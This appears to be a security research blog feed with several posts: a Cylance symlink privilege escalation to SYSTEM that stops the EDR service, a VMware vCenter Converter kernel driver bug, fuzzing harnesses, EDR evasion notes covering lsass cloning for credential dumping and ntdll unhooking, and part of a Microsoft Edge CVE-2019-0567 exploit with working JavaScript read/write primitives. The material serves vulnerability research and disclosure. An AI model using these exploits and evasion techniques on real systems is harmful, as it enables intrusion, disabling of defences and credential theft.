Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

Escalating Privileges with CylancePROTECT

1 May 2018 at 19:23

If you regularly perform penetration tests, red team exercises, or endpoint assessments, chances are you've probably encountered CylancePROTECT at some point. Depending on the CylancePROTECT policy configuration, your standard tools and techniques may not have worked as expected. I've ran into situations where the administrators of CylancePROTECT set the policy to be too relaxed and establishing a presence on the target system was trivial. With that said, I've also encountered targets where the policy was very strict and gaining a stable, reliable shell was not an easy task.

After a few frustrating CylancePROTECT encounters, I decided to install it locally and learn more about how it works to try and make my next encounter less frustrating. The majority of CylancePROTECT is written in .NET, so I started by firing up dnSpy, loaded the assemblies, and started looking around. I spent several nights and weekends casually looking through the codebase (which is quite massive) and found myself spending most of my time analyzing how the CylanceUI process communicated with the CylanceSvc process. My hope was that I would find a secret command I could use to stop the service as a user, but no such command exists (for users). However, I did find a privilege escalation vulnerability that could be triggered as a user via the inter-process communication ("IPC") channels.

Several commands can be sent to the CylanceSvc from the CylanceUI process via the tray menu, some of which are enabled by starting the UI with the advanced flag: CylanceUI.exe /advanced

CylanceUI Advanced Menu

CylanceUI Advanced Menu

Prior to starting a deeper investigation of the different menu options, I used Process Monitor to get high level view of how CylancePROTECT interacted with Windows when I clicked these menu options. My favorite option ended up being the logging verbosity, not only because it gave me an even deeper insight into what CylancePROTECT was doing, but also because it plays a major role in this privilege escalation vulnerability. The 'Check for Updates' option also caught my eye in procmon because it caused the CyUpdate process to spawn as SYSTEM.

CyUpdate Spawning as SYSTEM

CyUpdate Spawning as SYSTEM

The procmon output I witnessed at this point told me quite a bit and was what made me begin my hunt for a possible privilege escalation vulnerability. The three main indicators were:

  1. As a user, I could communicate with the CylanceSvc service and influences its behavior
  2. As a user, I could trigger the CyUpdate process to spawn with SYSTEM privileges
  3. As a user, I could cause the CylanceUI process to write to the same file/folder as the SYSTEM process
CylanceUI and CylanceSvc writing to log

CylanceUI and CylanceSvc writing to log

CyUpdate writing to log

CyUpdate writing to log

The third indicator is the most important. It’s not uncommon for a user process and system process to share the same resource, but it is uncommon for the user process to have full read/write permissions to that resource. I confirmed the permissions on the log folder and files with icacls:

Log folder and File Modify Permissions

Log folder and File Modify Permissions

Having modify permissions on a folder will allow for it to be setup as a mount point to redirect read/write operations to another location. I confirmed this by using James Forshaw's symboliclink-testing-tools to create a mount point, as well as try other symbolic link vectors. Before creating the mount point, I made sure to set CylancePROTECT’s log level to 'Error' to prevent additional logs from being created after I emptied the log folder.

Log folder mount point created

Log folder mount point created

After creating the mount point, I increased the log verbosity and confirmed the log file was created in the mount point target folder, C:\Windows.

CylanceSvc writing log to C:\Windows\

CylanceSvc writing log to C:\Windows\

CyUpdate change log file permissions

CyUpdate change log file permissions

Log file modify permissions

Log file modify permissions

Writing a log file to an arbitrary location is neat but doesn't demonstrate much impact or add value to an attack vector. To gain SYSTEM privileges with this vector, I needed to be able to control the filename that was written, as well as the contents of the file. Neither of these tasks can be accomplished by interacting with CylancePROTECT via the IPC channels. However, I was able to use one of Forshaw's clever symbolic link tricks to control the name of the file. This is done by using two symbolic links that are setup like this:

  1. C:\Program Files\Cylance\Desktop\log mount point folder points to the \RPC Control\ object directory.
  2. \RPC Control\2018-03-20.log symlink points to \??\C:\Windows\evil.dll

One of James' symbolic link testing tools will automatically create this symlink chain by simply specifying the original file and target destination, in this case the command looked like this, CreateSymlink.exe "C:\Program Files\Cylance\Desktop\log\2018-03-20.log" C:\Windows\evil.dll, and the result was:

Creating symlink chain to control filename

Creating symlink chain to control filename

File with arbitrary name created in C:\Windows

File with arbitrary name created in C:\Windows

At this point I've written a file to an arbitrary location with an arbitrary name and since the CyUpdate.exe process grants Users modify permissions on the "log file", I could overwrite the log contents with the contents of a DLL.

Contents of C:\Windows\evil.dll

Contents of C:\Windows\evil.dll

Verifying overwrite permissions

Verifying overwrite permissions

From here all I needed to get a SYSTEM shell was a DLL hijack in a SYSTEM service. I decided to target CylancePROTECT for this because I knew I could reliably spawn the CyUpdate process as a user. Leveraging Procmon again, I set my filters to:

  1. Path contains .dll
  2. Result contains NOT
  3. Process is CyUpdate.exe

The resulting output in procmon looked like this:

libc.dll hijack identified in procmon

libc.dll hijack identified in procmon

Now all I had to do was setup the chain again, but this time point the symlink to C:\Program Files\Cylance\Desktop\libc.dll (any of the highlighted locations would have worked). This symlink gave me a modifiable DLL that I could force CylancePROTECT to load and execute, resulting in a SYSTEM shell:

Gaining SYSTEM shell and stopping CylanceSvc

Gaining SYSTEM shell and stopping CylanceSvc

Elevating our privileges from a user to SYSTEM is great, but more importantly, we meet the conditions required to communicate with the CylancePROTECT kernel driver CYDETECT. This elevated privilege allows us to send the ENABLE_STOP IOCTL code to the kernel driver and gracefully stop the service. In the screenshot above, you’ll notice the CylanceSvc is stopped as a result of loading the DLL.

Privilege escalation vulnerabilities via symbolic links are quite common. James Forshaw has found many of them in Windows and other Microsoft products. The initial identification of these types of bugs can be performed without ever opening IDA or doing any sort of static analysis, as I’ve demonstrated above. With that said, it is still a good idea to find the offending code and determine if it’s within a library that affects multiple services or an isolated issue.

Preventing symbolic link attacks may not be as easy as you would think. From a developer’s perspective, these types of vulnerabilities don’t stand out like a SQLi, XSS, or RCE bug since they’re typically a hard to spot permissions issue. When privileged services need to share file system resources with low-privileged users, it is very important that the user permissions are minimal.

Upon finding this vulnerability, Cylance was contacted, and a collaborative effort was made through Bugcrowd to remediate the finding. Cylance responded to the submission quickly and validated the finding within a few days. The fix was deployed 40 days after the submission and was included in the 1470 release of CylancePROTECT.

If you have any questions or comments, feel free to reach out to me on Twitter: @ryHanson

Atredis Partners has assigned this vulnerability the advisory ID: ATREDIS-2018-0003.

The CVE assigned to this vulnerability is: CVE-2018-10722

Escalating Privileges with CylancePROTECT

Finding a Kernel 0-day in VMware vCenter Converter via Static Reverse Engineering

26 January 2022 at 22:40

I posted a poll on twitter (Christopher on Twitter: "Next blog topic?" / Twitter) to decide on what this blog post would be about, and the results indicated it should be about Kernel driver reversing.

I figured I’d make it a bit more exciting by finding a new Kernel 0-day to integrate into the blog post, and so I started thinking what driver would be a fun target.
I’ve reversed VMware drivers before, primarily ones relating to their Hypervisor, but I’ve also used their vCenter Converter tool before and wondered what attack surface that introduces when installed.

Turns out it installs a Kernel component (vstor2-x64.sys) which is interactable via low-privileged users, we can see this driver installed with the name “vstor2-mntapi20-shared” in the “Driver” directory using Sysinternals’ WinObj.exe tool.

To confirm low-privileged users can interact with this driver, we take a look at the “Device” directory.
Drivers have various ways of communicating with user-land code, one common method is for the driver to expose a device that user-land code can open a handle to (using the CreateFile APIs), we find the device with the same name, double-click it and view its security attributes:

We see in the device security properties that the “everyone” group has read & write permissions, this means low-privileged users can obtain a handle to the device and use it to communicate to the driver.

Note that the driver and device names in these directories are set in the driver’s DriverEntry when it is loaded by Windows, first the device is created using IoCreateDevice, usually followed by a symbolic link creation using IoCreateSymbolicLink to give access to user-land code.

When a user-land process wants to communicate with a device driver, it will obtain a file handle to the device. In this case the code would look like:

#define USR_DEVICE_NAME L"\\\\.\\vstor2-mntapi20-shared"

HANDLE hDevice = CreateFileW(USR_DEVICE_NAME,

GENERIC_READ | GENERIC_WRITE,

FILE_SHARE_READ | FILE_SHARE_WRITE,

NULL,

OPEN_EXISTING,

0,

NULL);

This code results in the IRP_MJ_CREATE_HANDLER dispatch handler for the driver being called, this dispatch handler is part of the DRIVER_OBJECT for the target driver, which is the first argument to the driver’s DriverEntry, this structure has a MajorFunction array which can be set to function pointers that will handle callbacks for various events (like the create handler being called when a process opens a handle to the device driver)

In the image above we know the first argument to DriverEntry for any driver is a pointer to the DRIVER_OBJECT structure, with this information we can follow where this variable is used to find the code that sets the function pointers for the MajorFunction array.

We can find out which MajorFunction index maps to which IRP_MJ_xxx function by looking at sample code provided by Microsoft, specifically on line 284 here.

Since we now know which array index maps to which function, we rename the functions with meaningful names as shown in the image above (e.g. we name entry 0xe to ioctl_handler, as it handles DeviceIoControl messages from processes.

The read & write callbacks are called when a process calls ReadFile or WriteFile on the device handle, there are other callbacks too which we won’t go through.

To start with, lets analyze the irp_mj_create handler and see what happens when we create a handle to this device driver.

By default, this is what we see:

Firstly, we can improve decompilation by setting the correct types for a1 and a2, which we know must conform to the DRIVER_DISPATCH specification.

Doing so results in the following:

There’s a few things happening in this function, two important structures shown that are usually important are:

  • DeviceExtension object in the DEVICE_OBJECT structure

  • FsContext object in the IRP->CurrentStackLocation->FileObject structure

The DeviceExtension object is a pointer to a buffer created and managed by the driver object. It is accessible to the driver via the DEVICE_OBJECT structure (and thus accessible to the driver in all DRIVER_DISPATCH callbacks. Drivers typically create and use this buffer to manage state, variables & other information the driver wants to be able to access in a variety of locations (for example, if the driver supports various functions to Open, Read, Write or Close TCP connections via IOCTLs, the driver may store its current state (e.g. whether the connection is Open or Closed) in this DeviceExtension buffer, and whenever the Close function is called, it will check the state in the DeviceExtension buffer to ensure its in a state that can be closed), essentially its just a buffer that the driver uses to store/retrieve information from a variety of contexts/functions.

The FsContext structure is similar and can be used as an arbitrary buffer, the main difference is that the DEVICE_OBJECT structure is created by the driver during the IoCreateDevice call, which means the DeviceExtension buffer does not get torn down or re-created when a user process opens or closes a handle to the device, while the FsContext structure is associated with a FILE_OBJECT structure that is created when CreateFile is called, and destroyed when the handle is closed, meaning the FsContext buffer is per-handle.

From the decompiled code we see that a buffer of 0x20 size is allocated and set to be the FsContext structure, and we also see that the first 64bits of this structure is set to v5 in the code, which corresponds to the DeviceExtension pointer, meaning we already figured out that the FsContext struct contains a pointer to the DeviceExtension as its first element.

E.g.

struct FsContext {

PVOID pDevExt;

};

Figuring out the rest of the elements to the FsContext and DeviceExtension structures is a simple but sometimes tedious process of looking at all the DRIVER_DISPATCH functions for the driver (like the ioctl handler) and noting down what offsets are accessed in these structs and how they’re used (e.g. if offset 0x8 in the DeviceExtension is used in a KeAcquireSpinLockRaiseToDpc call, then we know that offset is a pointer to a KSPIN_LOCK object).

Taking the time to documents the structures this way pays off, it helps greatly when trying to understanding the decompilation, as with some effort we can transform the IRP_MJ_CREATE handler to look like the below:

When looking at the FsContext structure for example, we can open Ida’s Local Types window and create it using C syntax, which I created below:

Note that as you figure out what each element is, you can define the elements as random junk and rename/retype them as you go (so long as you know the size of the structure, which we get easily here via the 0x20 size argument to ExAllocatePoolWithTag).

Now that we’ve analyzed the IRP_MJ_CREATE handler and determined there’s nothing stopping us from creating a handle, we can look into how the driver handles Read, Write & DeviceIOControl requests from user processes.

In analyzing these handlers, we see heavy usage of the FsContext and DeviceExtension buffers, including checks on whether its contents are initialized.

Turns out, there are quite a few vulnerabilities in this driver that are reachable if you form your input correctly to hit their code paths, while I won’t go through all of them (some are still pending disclosure!), we will take a look at one which is a simple user->kernel DoS.

In IOCTL 0x2A0014 we see the DeviceExtension buffer get memset to 0 to clear its contents:

This is followed by a memmove that copies 0x100 bytes from the user’s input buffer to the DeviceExtension buffer, meaning those byte offsets we copy into are user controlled (I denote this with a _uc tag at the end of the variable name:

During this IOCTL, another field in the DeviceExtension also gets set (which seems to indicate that the DeviceExtension buffer has been initialized):

This is critical to triggering the bug (which we will see next).

So, the actual bug doesn’t live in the IOCTL handlers, instead it lives in the IRP_MJ_READ and IRP_MJ_WRITE handlers (note that in this case the READ and WRITE handlers are the same function, they just check the provided IRP to determine if the operation is a READ or WRITE).

In this handler, we can see a check to determine if the DeviceExtension’s some_if_field has been initialized:

After clearing this condition, the bug can be seen in sub_12840 in the following condition statement:

Here we see I denoted the unkn13 variable in the DeviceExtension buffer with _uc, this means its user controlled (in fact, its set during the memmove call we saw earlier).

From the decompilation we see that the code does a % operation on our user controllable value, this translates to a div instruction:

If you’re familiar with X86, you’ll know that a div instruction on the value 0 causes a divide-by-zero exception, we can easily trigger this here by provided an input buffer filled with 0 when we call the IOCTL 0x2A0014 to set the user controllable contents in the DeviceExtension buffer, then we can trigger this code by attempting to read/write the device handle using ReadFile or WriteFile APIs.

In fact there are multiple ways to trigger this, as the DeviceExtension buffer is essentially a global buffer, and no locking is used when reading this value, there exist race conditions where one thread is calling IOCTL 0x2A0014 and another is calling the read or write handler, such that this div instruction may be hit right after the memset operation in IOCTL 0x2A0014 clears the DeviceExtension buffer to 0.

In fact, there are multiple locations such race conditions would affect the code paths taken in this driver!

Overall, this driver is a good target for reverse engineering practice with Kernel drivers due to its use of not only IOCTLs, but also read & write handlers + the use of the FsContext and DeviceExtension buffers that need to be reversed to understand what the driver is doing, and how we can influence it. All the bugs found in this driver were purely from static reverse engineering as a fun exercise.

Interested in Reverse Engineering & Vulnerability Research Training?

We frequently run public sessions (or private sessions upon request) for trainings in Reverse Engineering & Vulnerability Research, see our Upcoming Trainings or Subscribe to get notified of our next public session dates.

Emulating File I/O for In-Memory Fuzzing

12 October 2020 at 14:12

One problem I’ve encountered during fuzzing is how to best fuzz an application that performs multiple file reads on an input file, but in a performant way (e.g. in-memory without actually touching disk). For example, say an application takes in an input file path from a user and parses it, if the application loads the entire file into a single buffer to parse, this is simple to fuzz in-memory (we can modify the buffer in-memory and resume), however if the target does multiple reads on a file from disk, how can we fuzz performantly?

Of course if we’re fuzzing by replacing the file on disk for each fuzz case we can fuzz such a target, but for performance if we’re fuzzing entirely in-memory (or using a snapshot-fuzzer that doesn’t support disk-based I/O) we need to ensure each read operation the target performs on our input does not actually touch disk, but instead reads from memory.

The method I decided to implement for my fuzzing was to hook the different file IO operations (e.g. ReadFile) and implement my own custom handlers for these functions that redirects the read operations to memory instead of disk, this has multiple benefits:

  1. We eliminate syscalls, as lots of file operations result in syscalls and my custom handler does not use syscalls, we avoid context switching into the kernel and obtain better perf

  2. We keep track of different file operations but it all operates on a memory-mapped version of our input file, this means we can mutate the entire mem-mapped file once and guarantee all ReadFile calls will be on our mutated Memory-mapped file

The normal operation of reading a file (without using my hooks) is:

  1. CreateFile is called on a file target

  2. ReadFile is used on the target to read into a buffer (resulting in syscalls and disk IO)

  3. Process parses the buffer

  4. ReadFile is used on the target to read more from the file on disk

  5. Process continues to parse the buffer

Process Reading from Disk without Hooks

With our hooks, the operations instead look like:

  1. CreateFile is called on a file target (our hook memory maps the target once entirely in-memory)

  2. ReadFile is used on the target to read into a buffer (resulting in our custom ReadFile implementation to be called via our hook, and we handle the ReadFile by returning contents from our in-memory copy of the file, resulting in no syscalls or Disk IO)

  3. Process parses the buffer

  4. ReadFile is used on the target to read more from the file (in-memory again, just like the first ReadFile)

  5. Process continues to parse the buffer

Process Reading a File with our Hooks (In-Memory)

This greatly simplifies mutation and eliminates syscalls for the file IO operations.

The implementation wasn’t complex, MSDN has good documentation on how the APIs perform so we can emulate them, alongside writing a test suite to verify our emulation accuracy.

The code for this can be found on my GitHub: https://github.com/Kharos102/FileHook

Fuzzing FoxitReader 9.7’s ConvertToPDF

21 August 2020 at 15:12

Inspiration to create a fuzzing harness for FoxitReader’s ConvertToPDF function (targeting version 9.7) came from discovering Richard Johnson’s fuzzer for a previous version of FoxitReader.

(found here: https://www.cnblogs.com/st404/p/9384704.html).

Multiple changes have since been introduced in the way FoxitReader converts an image to a PDF, including the introduction of new Vtables entries, the necessity to load in the main FoxitReader.exe binary (including fixing the IAT and modifying data sections to contain valid handles to the current process heap) + more.

The source for my version of the fuzzing harness targeting version 9.7 can be found on my GitHub: https://github.com/Kharos102/FoxitFuzz9.7

Below is a quick walkthrough of the reversing and coding performed to get this harness working.

Firstly — based on the existing work from the previous fuzzers available, we know that most of the calls for the conversion of an image to a PDF occur via vtable function calls from an object returned from ConvertToPDF_x86!CreateFXPDFConvertor, however this could also be found manually by debugging the application and adding a breakpoint on file read accesses to the image we supply as a parameter to the conversion function, and then walking the call stack.

To start our harness, I decided to analyse how the actual FoxitReader.exe process sets up objects required for the conversion function by setting a breakpoint for the CreateFXPDFConvertor function.

Next, by stepping out and setting a breakpoint on all the vtable function pointers for the returned object, we can discover what order these functions are called along with their parameters as this will be necessary for us to setup the object before calling the actual conversion routine.

Dumping the Object’s VTable

We know how to view the vtable as the pointer to the vtable is the first 4-bytes (32bit) when dumping the object.

During this process we can notice multiple differences compared to the older versions of FoxitReader, including changes to existing function prototypes and the introduction of new vtable functions that require to be called.

After executing and noting the details of execution, we hit the main conversion function from the vtable of our object, here we can analyse the main parameter (some sort of conversion buffer structure) by viewing its memory and noting its contents.

First we see the initial 4-bytes are a pointer to an offset within the FoxitReader.exe image

Buffer Structure Analysis

This means our harness will have to load the FoxitReader image in-memory to also supply a valid pointer (we also have to fix its IAT and modify the image too, as we discover after testing the harness).

Then we continue noting down the buffer’s contents, including the input file path at offset +0x1624, the output file path at offset +0x182c, and more (including a version string).

Finally after the conversion the object is released and the buffer is freed.

After noting all the above we can make a harness from the information discovered and test.

During testing, certain issues where discovered and accounted for, including exceptions in FoxitReader.exe that was loaded into memory, due to imports being used, this was fixed by fixing up the process IAT when loaded.

Additionally, calls to HeapAlloc were occurring where the heap handle was obtained via an offset in the FoxitReader image loaded in-memory, however it was uninitialised, this was fixed by writing the current process heap handle into the FoxitReader image at the offset HeapAlloc was expecting.

Overall the process was not long and the resulting harness allows for fuzzing of the ConvertToPDF functionality in-memory for FoxitReader 9.7.

EDR Observations

20 August 2020 at 15:13

EDR Primer

EDRs generally contain the following components:

  • Self-Protection

  • Hooking Engine

  • Virtualization/Sandbox/Emulation

  • Log/Alert Generation

  • Network Comms

Quick Primer: Kernel Callbacks

EDRs also utilize kernel callbacks as exposed by the windows NT kernel, including:

  • PsSetCreateProcessNotifyRoutine

  • PsSetLoadImageNotifyRoutine

  • PsSetThreadCreateNotifyRoutine

  • ObRegisterCallbacks

  • CmRegisterCallbacks

Exported callback routines in ntoskrnl.exe

These callbacks may be used by kernel drivers such that when an event happens (process creation, registry modifications, handle creations, etc) the kernel driver is notified (pre or post op) and may interfere with the operation or result.

A common usage of this is for EDRs to be notified of process creations and inject their own userland DLLs (usually to hook NTDLL) in the newly created processes before they execute.

Additionally EDRs may intercept handle creation events and block those that occur on their protected processes (for example, in self-protection mode they may prevent other processes from obtaining handles to their processes).

Quick Primer: Disassembling Callbacks

Callbacks can be enumerated and disassembled on Windows via Kernel Debugging (or in-kernel disassembling e.g. by compiling a kernel driver with disassembly functionality such as via Capstone).

If using KD/Windbg, we can leverage public symbols to first disassemble the function PsSetCreateProcessNotifyRoutine with the command u nt!PsSetCreateProcessNotifyRoutine

Disassembly of Nt!PsSetCreateProcessNotifyRoutine in Windbg

We then follow any initial JMP (depending on the version of ntoskrnl.exe) to the main implementation of the function (e.g. nt!PspSetCreateProcessNotifyRoutine)

Continue disassembling the function and look for a LEA instruction on the callback array symbol. Callbacks are stored in arrays of an undocumented EX_CALLBACK structure from which we can discover the function pointer that points to the actual callback function registered for a particular driver.

LEA instruction operating on the callback array

As shown above, the callback array used in the LEA instruction on the last line (loaded into R13) also has the symbol nt!PspCreateProcessNotifyRoutine).

Next, we dump the contents of the callback array:

Dumping Contents of the Callback Array

Here the command dq nt!PspCreateProcessNotifyRoutine was used to dump the contents of the callback array symbol as quadwords.

We can resolve the callback function registered for each of these callback entries by changing the last byte of an entry from F to 8, this will contain a pointer to the function registered to the callback:

Disassembling a Callback Function

Above, we chose the first entry ffff998ae70d3b8f, then we change the last byte such that the value becomes ffff998ae70d3b88 then we disassembled it as instructions using the command u poi(ffff998ae70d3b88) discovering that this function is the callback function with the symbol nt!ViCreateProcessCallback.

Hooking

Hooking techniques are commonly used by EDRs to intercept userland functions for API monitoring or blocking. The following demonstrates a common use for hooking where an EDR registers for process callback notifications and injects a DLL into each newly created process, this DLL then hooks ntdll.dll functions to block/alert/monitor malicious behaviour (e.g. blocking calls to NtReadVirtualMemory where the target process handle represents the lsass process).

Process Injection via Callbacks

EDRs may also leverage sandbox, emulation or virtualization to run a binary in isolation and log API usage.

Common Weaknesses

The following list represents common weaknesses identified in multiple EDR solutions

Binary Padding

Scanning and emulation of a binary may be used to detect malicious behaviour, however many EDRs (and Ads) have file size limitations on the file to analyse.

As a result, by appending junk to the end of a binary until it is roughly 100mb in size may be enough to prevent the EDR/AV from analysing it (and due to the PE32/PE32+ format, junk appended at the end of an executable will not affect its execution).

This is effective against products that heavily rely on an emulation & scanning layer to detect threats.

Unmonitored APIs

Typical APIs used for malicious activity (e.g. combinations of VirtualAllocEx, WriteProcessMemory & CreateRemoteThread) may be alerted on by EDRs for process injection.

However, performing the same or similar actions with different sets of APIs may evade EDRs and go unnoticed.

For example, in the case of dumping sensitive process memory (like that from the lsass process) EDRs may not alert on handle creation of the target process, but may instead alert when an api like MiniDumpWriteDump or ReadProcessMemory is called on the target.

However, if we clone the target process with PssCaptureSnapshot and dump the memory of the cloned lsass process instead, we may bypass such detections. This stems from the following main factors:

  1. Simple handle creations on a target process are permitted;

  2. Cloning lsass is permitted; and

  3. Dumping memory of non-sensitive processes are permitted

By cloning lsass, the cloned lsass process doesn’t get the same protections by the EDR as the original lsass process, thereby permitting dumping of the lsass clone.

This can be performed using the Windows APIs, or by using tools like ProcDump.exe with the -r flag.

Another example is DLL injection via Windows hooks (e.g. leveraging SetWindowsHookEx api), this method of process injection does not rely on the typical Windows injection methods of opening a process, writing into the process memory and then spawning a new thread, and can bypass typical process injection detections.

Breaking Process Trees

EDRs leverage process trees for detecting malicious behaviour (e.g. alerting if word.exe spawns cmd.exe), however we can leverage COM objects such as C08AFD90-F2A1-11D1-8455-00A0C91F3880 that exposes the ShellExecute function to spawn arbitrary processes under the explorer.exe process, even from within VBScript running under word.exe.

There are other techniques too (e.g. leveraging RPC) that may also be applicable to break process-tree based detections.

Attacking EDRs

EDR weaknesses also include certain design flaws that make them susceptible to subversion.

For example, as shown above, userland hooking may be key to an EDR’s detection capabilities (such that without it, the product may be rendered useless).

EDRs that hook userland APIs via hooking ntdll.dll may be subverted by loading a fresh copy of ntdll.dll into the process and redirecting (via hooks) our API calls to the newly loaded (and unhooked by EDR) ntdll.

This technique along for bypassing EDR hooks may be enough to then perform malicious actions (like lsass dumping) without any alerts or detections.

EDRs also expose a lot of attack surface due to their massive codebase (drivers, IPC, support for various file formats) that may make them susceptible to a range of 0-day vulnerabilities, as such proper testing of these products should be a priority.

Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 3)

7 April 2022 at 00:00

Introduction

In part one of this blog series on “modern” browser exploitation, targeting Windows, we took a look at how JavaScript manages objects in memory via the Chakra/ChakraCore JavaScript engine and saw how type confusion vulnerabilities arise. In part two we took a look at Chakra/ChakraCore exploit primitives and turning our type confusion proof-of-concept into a working exploit on ChakraCore, while dealing with ASLR, DEP, and CFG. In part three, this post, we will close out this series by making a few minor tweaks to our exploit primitives to go from ChakraCore to Chakra (the closed-source version of ChakraCore which Microsoft Edge runs on in various versions of Windows 10). After porting our exploit primitives to Edge, we will then gain full code execution while bypassing Arbitrary Code Guard (ACG), Code Integrity Guard (CIG), and other minor mitigations in Edge, most notably “no child processes” in Edge. The final result will be a working exploit that can gain code execution with ASLR, DEP, CFG, ACG, CIG, and other mitigations enabled.

From ChakraCore to Chakra

Since we already have a working exploit for ChakraCore, we now need to port it to Edge. As we know, Chakra (Edge) is the “closed-source” variant of ChakraCore. There are not many differences between how our exploits will look (in terms of exploit primitives). The only thing we need to do is update a few of the offsets from our ChakraCore exploit to be compliant with the version of Edge we are exploiting. Again, as mentioned in part one, we will be using an UNPATCHED version of Windows 10 1703 (RS2). Below is an output of winver.exe, which shows the build number (15063.0) we are using. The version of Edge we are using has no patches and no service packs installed.

Moving on, below you can find the code that we will be using as a template for our exploitation. We will name this file exploit.html and save it to our Desktop (feel free to save it anywhere you would like).

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");
}
</script>

Nothing about this code differs in the slightest from our previous exploit.js code, except for the fact we are now using an HTML, as obviously this is the type of file Edge expects as it’s a web browser. This also means that we have replaced print() functions with proper document.write() HTML methods in order to print our exploit output to the screen. We have also added a <script></script> tag to allow us to execute our malicious JavaScript in the browser. Additionally, we added functionality in the <button onclick="main()">Click me to exploit CVE-2019-0567!</button> line, where our exploit won’t be executed as soon as the web page is opened. Instead, this button allows us choose when we want to detonate our exploit. This will aid us in debugging as we will see shortly.

Once we have saved exploit.html, we can double-click on it and select Microsoft Edge as the application we want to open it with. From there, we should be presented with our Click me to exploit CVE-2019-0567 button.

After we have loaded the web page, we can then click on the button to run the code presented above for exploit.html.

As we can see, everything works as expected (per our post number two in this blog series) and we leak the vftable from one of our DataView objects, from our exploit primitive, which is a pointer into chakra.dll. However, as we are exploiting Edge itself now and not the ChakraCore engine, computation of the base address of chakra.dll will be slightly different. To do this, we need to debug Microsoft Edge in order to compute the distance between our leaked address and chakra.dll’s base address. With that said, we will need to talk about debugging Edge in order to compute the base address of chakra.dll.

We will begin by making use of Process Hacker to aid in our debugging. After downloading Process Hacker, we can go ahead and start it.

After starting Process Hacker, let’s go ahead and re-open exploit.html but do not click on the Click me to exploit CVE-2019-0567 button yet.

Coming back to Process Hacker, we can see two MicrosoftEdgeCP.exe processes and a MicrosoftEdge.exe process.

Where do these various processes come from? As the CP in MicrosoftEdgeCP.exe infers, these are Microsoft Edge content processes. A content process, also known as a renderer process, is the actual component of the browser which executes the JavaScript, HTML, and CSS code a user interfaces with. In this case, we can see two MicrosoftEdgeCP.exe processes. One of these processes refers to the actual content we are seeing (the actual exploit.html web page). The other MicrosoftEdgeCP.exe process is technically not a content process, per se, and is actually the out-of-process JIT server which we talked about previously in this blog series. What does this actually mean?

JIT’d code is code that is generated as readable, writable, and executable (RWX). This is also known as “dynamic code” which is generated at runtime, and it doesn’t exist when the Microsoft Edge processes are spawned. We will talk about Arbitrary Code Guard (ACG) in a bit, but at a high level ACG prohibits any dynamic code (amongst other nuances we will speak of at the appropriate time) from being generated which is readable, writable, and executable (RWX). Since ACG is a mitigation, which was actually developed with browser exploitation and Edge in mind, there is a slight usability issue. Since JIT’d code is a massive component of a modern day browser, this automatically makes ACG incompatible with Edge. If ACG is enabled, then how can JIT’d code be generated, as it is RWX? The solution to this problem is by leveraging an out-of-process JIT server (located in the second MicrosoftEdgeCP.exe process).

This JIT server process has Arbitrary Code Guard disabled. The reason for this is because the JIT process doesn’t handle any execution of “untrusted” JavaScript code - meaning the JIT server can’t really be exploited by browser exploitation-related primitives, like a type confusion vulnerability (we will prove this assumption false with our ACG bypass). The reason is that since the JIT process doesn’t execute any of that JavaScript, HTML, or CSS code, meaning we can infer the JIT server doesn’t handled any “untrusted code”, a.k.a JavaScript provided by a given web page, we can infer that any code running within the JIT server is “trusted” code and therefore we don’t need to place “unnecessary constraints” on the process. With the out-of-process JIT server having no ACG-enablement, this means the JIT server process is now compatible with “JIT” and can generate the needed RWX code that JIT requires. The main issue, however, is how do we get this code (which is currently in a separate process) into the appropriate content process where it will actually be executed?

